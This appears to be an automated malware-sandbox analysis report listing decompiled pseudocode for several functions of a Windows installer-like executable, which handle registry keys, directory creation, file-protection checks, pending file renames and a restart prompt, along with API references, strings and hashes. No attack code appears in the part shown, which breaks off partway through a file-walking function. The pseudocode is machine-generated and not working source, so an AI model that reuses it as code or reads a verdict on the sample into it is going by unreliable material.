0x00000000
0x0042dd84
0x00000000
0x0042dd8d
0x0042dd82
0x0042dd50
0x0042dd57

APIs

RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD50
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DEEB,00000000,0042DF03,?,?,?,?,00000006,?,00000000,00495AFB), ref: 0042DD6B
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD71

Strings

RegDeleteKeyExA, xrefs: 0042DD61
advapi32.dll, xrefs: 0042DD66

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressDeleteHandleModuleProc
String ID: RegDeleteKeyExA$advapi32.dll
API String ID: 588496660-1846899949
Opcode ID: 6ba33c0c3f2a9b2a2f11b0a68c52ddfa7e29286ec7fe51218607e016af5f805d
Instruction ID: 8849bbb900f41b2762779cca63578ff987da71f18731b786730cc0d50ecce640
Opcode Fuzzy Hash: 6ba33c0c3f2a9b2a2f11b0a68c52ddfa7e29286ec7fe51218607e016af5f805d
Instruction Fuzzy Hash: 7DE0EDF0B50A30AAD72022657C8ABA32728CB65326FA8A437F044A9191C2BC0C40CE9C

Uniqueness

Uniqueness Score: -1.00%

Function 00481034 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00481034(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr* _v8;
				char _v9;
				char _v10;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t57;
				void* _t64;
				intOrPtr _t79;
				intOrPtr _t118;
				signed int _t126;
				intOrPtr _t146;
				intOrPtr _t151;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t166;
				intOrPtr _t174;
				intOrPtr _t175;
				intOrPtr _t185;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				void* _t203;
				void* _t204;
				intOrPtr _t205;
				void* _t213;

				_t213 = __fp0;
				_t200 = __esi;
				_t199 = __edi;
				_t155 = __ecx;
				_t203 = _t204;
				_t205 = _t204 + 0xffffffe4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v32 = 0;
				_v20 = 0;
				_v16 = 0;
				_v8 = __eax;
				_push(_t203);
				_push(0x481349);
				_push( *[fs:eax]);
				 *[fs:eax] = _t205;
				_v9 = 0;
				_push(_t203);
				_push(0x4812fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t205;
				_t57 = E0046B128( *0x49b048, __ecx, 0);
				_t207 = _t57;
				if(_t57 == 0) {
					E00408BC0();
				}
				E00414AD0( *((intOrPtr*)( *0x49b048 + 0x20c)),  &_v20, _t207);
				E00403450(0x49b344, 0x49b048, _v20, _t199, _t200);
				_t64 = E0046B438( *0x49b048, 0x49b048, _t155, _t199, _t200, _t207);
				_t208 = _t64;
				if(_t64 == 0) {
					E00408BC0();
				}
				E00414AD0( *((intOrPtr*)( *0x49b048 + 0x210)),  &_v20, _t208);
				E00403450(0x49b348, 0x49b048, _v20, _t199, _t200);
				 *0x49b34c = E0042B0AC( *((intOrPtr*)( *0x49b048 + 0x214)));
				 *0x49b350 = E00468C04( *0x49b048);
				_t156 =  *0x49b358; // 0x226793c
				_t174 =  *0x49b354; // 0x2267910
				E00469198( *0x49b048, _t156, _t174);
				_t157 =  *0x49b360; // 0x2267994
				_t175 =  *0x49b35c; // 0x2267968
				E00469218( *0x49b048, _t157, _t175);
				_t209 =  *0x49b0b4;
				if( *0x49b0b4 != 0) {
					_t151 =  *0x49b0b4; // 0x0
					E0047868C(_t151, 0x49b048, _t199, _t200, _t209);
				}
				_t79 =  *0x49a628; // 0x2262410
				E004241C4(_t79);
				 *((intOrPtr*)( *_v8 + 0x50))();
				_t210 =  *0x49b36d - 1;
				if( *0x49b36d == 1) {
					_t146 =  *0x49a628; // 0x2262410
					SetActiveWindow( *(_t146 + 0x20));
					E00422DEC( *0x49b048);
				}
				 *((intOrPtr*)( *((intOrPtr*)( *0x49b048)) + 0x50))();
				E00480630(_v8, 0, 1);
				E00474640( &_v10, 0x49b048, 0, _t199, _t200, _t210, _t213); // executed
				if(_v10 != 0) {
					E00414A68( *((intOrPtr*)( *0x49b048 + 0x1b8)), 0);
					E00480D9C(0x49b048, 0, _t199, _t200, _t203); // executed
					E00480630(_v8, 1, 2);
					__eflags =  *0x49b29b & 0x00000020;
					if(( *0x49b29b & 0x00000020) != 0) {
						SHChangeNotify(0x8000000, 0, 0, 0);
					}
					__eflags =  *0x49b29e & 0x00000040;
					if(( *0x49b29e & 0x00000040) != 0) {
						E00455194(1);
					}
					__eflags =  *0x49b36d;
					if( *0x49b36d != 0) {
						E00422DE4();
					}
					_v28 =  *0x00498AC8;
					_v24 = 0xb;
					E00456D64("Need to restart Windows? %s", 0x49b048, 0,  &_v28, _t199, _t200);
					__eflags =  *0x49b376;
					if( *0x49b376 == 0) {
						L19:
						__eflags =  *0x49b3b4;
						if( *0x49b3b4 == 0) {
							E00465B80(0x50,  &_v16);
						} else {
							E00465B80(0x4f,  &_v16);
						}
						E00403494( &_v32, _v16);
						E0040357C( &_v32, 0x481388);
						_t185 =  *0x49ac8c; // 0x227c7c4
						E0040357C( &_v32, _t185);
						E00468524( *0x49b048, 0x49b048, 0, _v32, _t199, _t200, __eflags);
						__eflags =  *0x49b376;
						if( *0x49b376 == 0) {
							_t166 =  *0x49b35c; // 0x2267968
							_t190 =  *0x49b354; // 0x2267910
							E004685EC( *0x49b048, 0x49b048, _t166, _t190, _t199, _t200);
							_t126 =  *((intOrPtr*)( *( *( *((intOrPtr*)( *0x49b048 + 0x2d4)) + 0xfc)) + 0x10))();
							_t126 = _t126 > 0;
							E00414A2C( *((intOrPtr*)( *0x49b048 + 0x2d4)), _t166,  *( *( *((intOrPtr*)( *0x49b048 + 0x2d4)) + 0xfc)) & 0xffffff00 | _t126 > 0x00000000, _t199);
						}
						goto L24;
					} else {
						__eflags =  *0x49b0bb;
						if(__eflags != 0) {
							goto L19;
						}
						E00465B80(0x51,  &_v32);
						E00468524( *0x49b048, 0x49b048, 0, _v32, _t199, _t200, __eflags);
						E00414A2C( *((intOrPtr*)( *0x49b048 + 0x25c)), 0, 1, _t199);
						E00414A2C( *((intOrPtr*)( *0x49b048 + 0x260)), 0, 1, _t199);
						L24:
						__eflags =  *0x49b36d;
						if( *0x49b36d == 0) {
							_t118 =  *0x49a628; // 0x2262410
							E004241C4(_t118);
							 *((intOrPtr*)( *_v8 + 0x50))();
						}
						_v9 = 1;
						_pop(_t187);
						 *[fs:eax] = _t187;
						goto L27;
					}
				} else {
					E0047FDE8();
					_pop(_t198);
					 *[fs:eax] = _t198;
					L27:
					_pop(_t188);
					 *[fs:eax] = _t188;
					_push(0x481350);
					E00403400( &_v32);
					E00403400( &_v20);
					return E00403400( &_v16);
				}
			}

0x00481034
0x00481034
0x00481034
0x00481034
0x00481035
0x00481037
0x0048103a
0x0048103b
0x0048103c
0x0048103f
0x00481042
0x00481045
0x00481048
0x00481052
0x00481053
0x00481058
0x0048105b
0x0048105e
0x00481064
0x00481065
0x0048106a
0x0048106d
0x00481072
0x00481077
0x00481079
0x0048107b
0x0048107b
0x0048108b
0x00481098
0x0048109f
0x004810a4
0x004810a6
0x004810a8
0x004810a8
0x004810b8
0x004810c5
0x004810d7
0x004810e3
0x004810e8
0x004810ee
0x004810f6
0x004810fb
0x00481101
0x00481109
0x0048110e
0x00481115
0x00481117
0x0048111c
0x0048111c
0x00481121
0x00481126
0x00481130
0x00481133
0x0048113a
0x0048113c
0x00481145
0x0048114c
0x0048114c
0x00481155
0x0048115f
0x00481167
0x00481170
0x0048118e
0x00481194
0x004811a1
0x004811a6
0x004811ad
0x004811ba
0x004811ba
0x004811bf
0x004811c6
0x004811c8
0x004811c8
0x004811cd
0x004811d4
0x004811d8
0x004811d8
0x004811eb
0x004811ee
0x004811fc
0x00481201
0x00481208
0x0048124a
0x0048124a
0x00481251
0x00481264
0x00481253
0x00481258
0x00481258
0x0048126f
0x0048127c
0x00481284
0x0048128a
0x00481294
0x00481299
0x004812a0
0x004812a2
0x004812a8
0x004812b0
0x004812c5
0x004812ca
0x004812cf
0x004812cf
0x00000000
0x0048120a
0x0048120a
0x00481211
0x00000000
0x00000000
0x00481218
0x00481222
0x00481231
0x00481240
0x004812d4
0x004812d4
0x004812db
0x004812dd
0x004812e2
0x004812ec
0x004812ec
0x004812ef
0x004812f5
0x004812f8
0x00000000
0x004812f8
0x00481172
0x00481172
0x00481179
0x0048117c
0x00481323
0x00481325
0x00481328
0x0048132b
0x00481333
0x0048133b
0x00481348
0x00481348

APIs

SetActiveWindow.USER32(?,?,00000000,00481349,?,?,00000001,?), ref: 00481145
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004811BA

Strings

, xrefs: 00481277
Need to restart Windows? %s, xrefs: 004811F7

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s
API String ID: 1160245247-4200181552
Opcode ID: 2632368513b0e5f18acf72e4f94491449ec0108c7927ac9353e149977ac1c910
Instruction ID: b7518ae6c24e12b434ec98debcafbd5afd06e75a53ee4342f5f4b68eb4a2c3c1
Opcode Fuzzy Hash: 2632368513b0e5f18acf72e4f94491449ec0108c7927ac9353e149977ac1c910
Instruction Fuzzy Hash: E89184306042448FDB10FB69E985B9E77E5EF59308F1484BBE8009B362DB78A905CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046E738 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0046E738(signed int __eax, void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v9;
				char _v10;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				void* _t92;
				signed int _t103;
				intOrPtr* _t108;
				signed int _t133;
				signed int _t138;
				intOrPtr _t153;
				void* _t158;
				void* _t174;
				void* _t176;

				_t176 = __eflags;
				_t169 = __edi;
				_t135 = __ecx;
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v44 = 0;
				_v48 = 0;
				_v9 = __ecx;
				_v8 = __edx;
				_t133 = __eax;
				E00403728(_v8);
				_push(_t174);
				_push(0x46e935);
				_push( *[fs:eax]);
				 *[fs:eax] = _t174 + 0xffffffd0;
				_v10 = 0;
				E0042C7A8(_v8,  &_v20);
				E0042CB64(_v20, _t135,  &_v16, _t176);
				E00403494( &_v8, _v16);
				E0042C8D0(_v8, _t135,  &_v16);
				_t177 = _v16;
				if(_v16 == 0) {
					L16:
					_pop(_t153);
					 *[fs:eax] = _t153;
					_push(0x46e93c);
					E00403420( &_v48, 2);
					E00403420( &_v20, 2);
					return E00403400( &_v8);
				}
				_t92 = E00451CE0(_t133, _v8, _t177); // executed
				if(_t92 == 0) {
					_push(_a4);
					E0042C848(_v8, _t135,  &_v16);
					_push(_v16);
					_t138 =  *0x46e948; // 0x2
					_pop(_t158); // executed
					E0046E738(_t133, _t133,  !_t138 & _v9, _t158, __edi, __esi, __eflags); // executed
					_v28 = _v8;
					_v24 = 0xb;
					_t142 = 0;
					E00456D64("Creating directory: %s", _t133, 0,  &_v28, __edi, __esi);
					_t103 = E00451AD0(_t133, _v8, __eflags); // executed
					__eflags = _t103;
					if(_t103 == 0) {
						_t133 = GetLastError();
						E004507B8(0x2f,  &_v20, _v8);
						_v40 = _v20;
						E00406D48(_t133,  &_v44);
						_v36 = _v44;
						E0042E714(_t133,  &_v48);
						_v32 = _v48;
						E00450788(0x60, 2,  &_v40,  &_v16);
						_t142 = _v16;
						E00408BEC(_v16, 1);
						E0040311C();
					}
					_v10 = 1;
					__eflags = _v9 & 0x00000008;
					if((_v9 & 0x00000008) != 0) {
						SHChangeNotify(8, 1, E00403738(_v8), 0);
						E0042C848(_v8, _t142,  &_v16);
						SHChangeNotify(0x1000, 0x1001, E00403738(_v16), 0);
					}
					L8:
					if((_v9 & 0x00000004) == 0) {
						__eflags = _v9 & 0x00000001;
						if((_v9 & 0x00000001) == 0) {
							_t171 = 2;
							__eflags = _t133;
							if(_t133 != 0) {
								_t171 = 0x22;
								__eflags = 2;
							}
							__eflags = _v9 & 0x00000008;
							if((_v9 & 0x00000008) != 0) {
								__eflags = _t171;
							}
							_v52 = _v8;
							E004595A0( *((intOrPtr*)(_a4 - 4)), _t133,  &_v52, 0x81, _t169, _t171, _t171, 0);
						}
					} else {
						_t108 =  *0x49b398; // 0x2267b2c
						 *((intOrPtr*)( *_t108 + 0x30))();
					}
					goto L16;
				}
				if((_v9 & 0x00000002) == 0) {
					goto L16;
				} else {
					goto L8;
				}
			}

0x0046e738
0x0046e738
0x0046e738
0x0046e73f
0x0046e740
0x0046e743
0x0046e746
0x0046e749
0x0046e74c
0x0046e74f
0x0046e752
0x0046e755
0x0046e75a
0x0046e761
0x0046e762
0x0046e767
0x0046e76a
0x0046e76d
0x0046e777
0x0046e782
0x0046e78d
0x0046e798
0x0046e79d
0x0046e7a1
0x0046e905
0x0046e907
0x0046e90a
0x0046e90d
0x0046e91a
0x0046e927
0x0046e934
0x0046e934
0x0046e7ac
0x0046e7b3
0x0046e7c7
0x0046e7ce
0x0046e7d6
0x0046e7d7
0x0046e7e4
0x0046e7e5
0x0046e7ee
0x0046e7f1
0x0046e7f8
0x0046e7ff
0x0046e809
0x0046e80e
0x0046e810
0x0046e817
0x0046e825
0x0046e82d
0x0046e835
0x0046e83d
0x0046e845
0x0046e84d
0x0046e85a
0x0046e85f
0x0046e869
0x0046e86e
0x0046e86e
0x0046e873
0x0046e877
0x0046e87b
0x0046e88c
0x0046e899
0x0046e8b1
0x0046e8b1
0x0046e8b6
0x0046e8ba
0x0046e8cf
0x0046e8d3
0x0046e8d5
0x0046e8da
0x0046e8dc
0x0046e8de
0x0046e8de
0x0046e8de
0x0046e8e1
0x0046e8e5
0x0046e8e7
0x0046e8e7
0x0046e8f0
0x0046e900
0x0046e900
0x0046e8bc
0x0046e8c3
0x0046e8ca
0x0046e8ca
0x00000000
0x0046e8ba
0x0046e7b9
0x00000000
0x0046e7bf
0x00000000
0x0046e7bf

APIs

Part of subcall function 0042C7A8: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7CC

GetLastError.KERNEL32(00000000,0046E935,?,?,0049B16C,00000000), ref: 0046E812
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046E88C
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046E8B1

Strings

Creating directory: %s, xrefs: 0046E7FA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ChangeNotify$ErrorFullLastNamePath
String ID: Creating directory: %s
API String ID: 2451617938-483064649
Opcode ID: 7bc52a751bae8aad4b8b22a977d63f035b0830912d6c3df21cb0ec933ebaf490
Instruction ID: 4ee510699ab3891379a8d4aa2ce95a2023a24a897400e35ef917b5abcdeb6947
Opcode Fuzzy Hash: 7bc52a751bae8aad4b8b22a977d63f035b0830912d6c3df21cb0ec933ebaf490
Instruction Fuzzy Hash: 54513674E00248ABDB11DFA6C586BDEB7F5AF49304F50816AE840B7382D7785E04DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00453FF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00453FF0(void* __eax, void* __ebx, void* __edx, void* __edi, struct HINSTANCE__* __esi) {
				char _v8;
				short _v8200;
				char _v8204;
				char _v8208;
				char _v8212;
				void* _t29;
				int _t41;
				void* _t46;
				struct HINSTANCE__* _t62;
				_Unknown_base(*)()* _t63;
				char _t65;
				intOrPtr _t73;
				void* _t83;
				void* _t86;
				void* _t87;

				_t84 = __esi;
				_t86 = _t87;
				_push(__eax);
				_t29 = 2;
				do {
					_t87 = _t87 + 0xfffff004;
					_push(_t29);
					_t29 = _t29 - 1;
				} while (_t29 != 0);
				_push(__ebx);
				_push(__esi);
				_v8204 = 0;
				_v8208 = 0;
				_v8212 = 0;
				_v8 = 0;
				_t83 = __edx;
				_t65 = _v8;
				_push(_t86);
				_push(0x454164);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xfffffff4;
				if( *0x49afa0 == 0) {
					E0042D868( &_v8212);
					E0042C3E4(_v8212,  &_v8208);
					E0040357C( &_v8208, "sfc.dll");
					E0040352C( &_v8204, E00403738(_v8208));
					_t62 = E0042E294(_v8204, _t65, 0x8000); // executed
					_t84 = _t62;
					if(_t84 != 0) {
						_t63 = GetProcAddress(_t84, "SfcIsFileProtected"); // executed
						 *0x49afa4 = _t63;
					}
					 *0x49afa0 = 1;
				}
				if( *0x49afa4 != 0) {
					E0042C7A8(_t83,  &_v8);
					if(_t65 == 0) {
						E00452E94(_v8, _t65, 0,  &_v8204, _t83, _t84);
						E00403494( &_v8, _v8204);
					}
					_t41 = E00403574(_v8);
					 *((short*)(_t86 + MultiByteToWideChar(0, 0, E00403738(_v8), _t41,  &_v8200, 0xfff) * 2 - 0x2004)) = 0;
					if(_v8200 == 0) {
						L11:
					} else {
						_t46 =  *0x49afa4(0,  &_v8200); // executed
						if(_t46 == 0) {
							goto L11;
						}
					}
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(0x45416b);
				E00403420( &_v8212, 3);
				return E00403400( &_v8);
			}

0x00453ff0
0x00453ff1
0x00453ff3
0x00453ff4
0x00453ff9
0x00453ff9
0x00453fff
0x00454000
0x00454000
0x00454009
0x0045400a
0x0045400e
0x00454014
0x0045401a
0x00454020
0x00454023
0x00454025
0x00454029
0x0045402a
0x0045402f
0x00454032
0x0045403c
0x00454044
0x00454055
0x00454065
0x0045407d
0x0045408d
0x00454092
0x00454096
0x0045409e
0x004540a3
0x004540a3
0x004540a8
0x004540a8
0x004540b6
0x004540c1
0x004540c8
0x004540d3
0x004540e1
0x004540e1
0x004540f5
0x0045410d
0x0045411f
0x00454134
0x00454121
0x0045412a
0x00454132
0x00000000
0x00000000
0x00454132
0x0045411f
0x00454140
0x00454143
0x00454146
0x00454156
0x00454163

APIs

GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045409E
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454164), ref: 00454108

Strings

SfcIsFileProtected, xrefs: 00454098
sfc.dll, xrefs: 00454060

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressByteCharMultiProcWide
String ID: SfcIsFileProtected$sfc.dll
API String ID: 2508298434-591603554
Opcode ID: 80ea0f9c1ef16fc2e305e2824c6c547855aab8fc8e2d96e11feaf7447c016dcb
Instruction ID: 90d309ceba18d338d04f95da4ca9752badc644df74883720a6d250ff35c3934d
Opcode Fuzzy Hash: 80ea0f9c1ef16fc2e305e2824c6c547855aab8fc8e2d96e11feaf7447c016dcb
Instruction Fuzzy Hash: 9941A970A007149FEB20DB55DC85B9E77B8AF54309F5041B7A908A7292E7389F88CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00454C2C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00454C2C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* __ebp;
				void* _t7;
				long _t15;
				intOrPtr _t27;
				intOrPtr _t31;
				intOrPtr _t33;

				_t31 = _t33;
				_t7 = E0042DD1C(0, "SYSTEM\\CurrentControlSet\\Control\\Session Manager", 0x80000002,  &_v8, 1, 0); // executed
				if(_t7 != 0) {
					return _t7;
				} else {
					_push(_t31);
					_push(0x454c90);
					_push( *[fs:eax]);
					 *[fs:eax] = _t33;
					E00454B60(_v8, __ebx, "PendingFileRenameOperations", __edi, __esi, _t31); // executed
					E00454B60(_v8, __ebx, "PendingFileRenameOperations2", __edi, __esi, _t31); // executed
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x454c97);
					_t15 = RegCloseKey(_v8); // executed
					return _t15;
				}
			}

0x00454c2d
0x00454c44
0x00454c4b
0x00454c99
0x00454c4d
0x00454c4f
0x00454c50
0x00454c55
0x00454c58
0x00454c64
0x00454c73
0x00454c7b
0x00454c7e
0x00454c81
0x00454c8a
0x00454c8f
0x00454c8f

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegCloseKey.ADVAPI32(?,00454C97,?,00000001,00000000), ref: 00454C8A

Strings

PendingFileRenameOperations2, xrefs: 00454C6B
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C38
PendingFileRenameOperations, xrefs: 00454C5C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-2115312317
Opcode ID: de5c5a186c0f72f9ea332df7e2fc4e45ab9f597a021cfdbcf1a60e9d25ac79f4
Instruction ID: b3a4d9f2827480872f5e18d1b9ef055898de5938c65bba9e4ca707b6db82d622
Opcode Fuzzy Hash: de5c5a186c0f72f9ea332df7e2fc4e45ab9f597a021cfdbcf1a60e9d25ac79f4
Instruction Fuzzy Hash: C2F09631705208BFD706DAA6EC12F1A77ACD7C4719FB24467F8008B582DA79FD44951C

Uniqueness

Uniqueness Score: -1.00%

Function 00470D8C Relevance: 6.3, APIs: 4, Instructions: 263
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00470D8C(char __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v5;
				intOrPtr _v12;
				signed int _v16;
				signed int _v17;
				signed int _v24;
				char _v28;
				signed int _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				struct _WIN32_FIND_DATAA _v368;
				char _v372;
				char _v376;
				void* _t145;
				signed int _t146;
				intOrPtr _t153;
				intOrPtr _t157;
				signed int _t178;
				int _t181;
				signed char _t201;
				signed char _t202;
				int _t205;
				void* _t219;
				intOrPtr* _t229;
				intOrPtr _t245;
				intOrPtr _t258;
				intOrPtr _t275;
				intOrPtr _t283;
				void* _t294;
				void* _t295;
				intOrPtr _t296;

				_t292 = __esi;
				_t291 = __edi;
				_t294 = _t295;
				_t296 = _t295 + 0xfffffe8c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v372 = 0;
				_v376 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v5 = __eax;
				_push(_t294);
				_push(0x47112b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t296;
				_push(_v12);
				_push(_v16);
				_push(_a20);
				E00403634();
				_v17 = 0;
				_t241 =  &_v368;
				_t145 = E00451DC0(_v5,  &_v368, _v24, __eflags); // executed
				_v40 = _t145;
				if(_v40 == 0xffffffff) {
					_t146 = _a12;
					__eflags =  *(_t146 + 0x50) & 0x00000020;
					if(( *(_t146 + 0x50) & 0x00000020) == 0) {
						L23:
						__eflags = _v16;
						if(_v16 != 0) {
							_t153 = _a12;
							__eflags =  *(_t153 + 0x51) & 0x00000002;
							if(( *(_t153 + 0x51) & 0x00000002) != 0) {
								__eflags = _v17;
								if(_v17 == 0) {
									E0047AA00( *((intOrPtr*)(_a12 + 4)), _t241,  &_v36);
									_t157 = _a12;
									__eflags =  *(_t157 + 0x4f) & 0x00000010;
									if(( *(_t157 + 0x4f) & 0x00000010) != 0) {
										E0042C8F8(_v36, _t241,  &_v372);
										E004035C0( &_v36, _v16, _v372);
									} else {
										E0040357C( &_v36, _v16);
									}
									_t245 =  *0x471158; // 0x0
									E0046E738(_v5, 0, _t245, _v36, _t291, _t292, __eflags,  *((intOrPtr*)(_a24 + 8)));
									_v17 = 1;
								}
							}
						}
						E0046D18C();
						__eflags = 0;
						_pop(_t258);
						 *[fs:eax] = _t258;
						_push(0x471132);
						E00403420( &_v376, 2);
						return E00403420( &_v36, 4);
					} else {
						E00403494( &_v372, _v12);
						E0040357C( &_v372, _v16);
						E0040357C( &_v372, 0x471148);
						_t241 =  &_v368;
						_v40 = E00451DC0(_v5,  &_v368, _v372, __eflags);
						__eflags = _v40 - 0xffffffff;
						if(_v40 == 0xffffffff) {
							goto L23;
						} else {
							__eflags = 0;
							_push(_t294);
							_push(0x47107f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t296;
							do {
								_t178 = E0047BC50( &_v368);
								__eflags = _t178;
								if(_t178 != 0) {
									E00403494( &_v372, _v16);
									E0040355C( &_v376, 0x104,  &(_v368.cFileName));
									E0040357C( &_v372, _v376);
									E0040357C( &_v372, 0x471154);
									_t201 = E00470D8C(_v5, 0, _v372, _v12, _t291, _t292, __eflags, _a4, _a8, _a12, _a16, _a20, _a24) | _v17;
									__eflags = _t201;
									_v17 = _t201;
								}
								_t181 = FindNextFileA(_v40,  &_v368);
								__eflags = _t181;
							} while (_t181 != 0);
							__eflags = 0;
							_pop(_t275);
							 *[fs:eax] = _t275;
							_push(0x471086);
							return FindClose(_v40);
						}
					}
				} else {
					_push(_t294);
					_push(0x470f5d);
					_push( *[fs:edx]);
					 *[fs:edx] = _t296;
					do {
						_t202 = _v368.dwFileAttributes;
						if((_t202 & 0x00000010) == 0) {
							if(_a16 == 0) {
								E00403494( &_v28, _a20);
								L7:
								_v17 = 1;
								_push(_v12);
								_push(_v16);
								_push(_v28);
								E00403634();
								E0047AA00( *((intOrPtr*)(_a12 + 4)), _t241,  &_v36);
								if(( *(_a12 + 0x4f) & 0x00000010) != 0) {
									__eflags = _v16;
									if(_v16 != 0) {
										E0042C8F8(_v36, _t241,  &_v372);
										_push(_v372);
										_push(_v16);
										E0042C8D0(_v36, _t241,  &_v376);
										_push(_v376);
										E00403634();
									}
								} else {
									_push(_v36);
									_push(_v16);
									_push(_v28);
									E00403634();
								}
								_v44 = _v368.nFileSizeHigh;
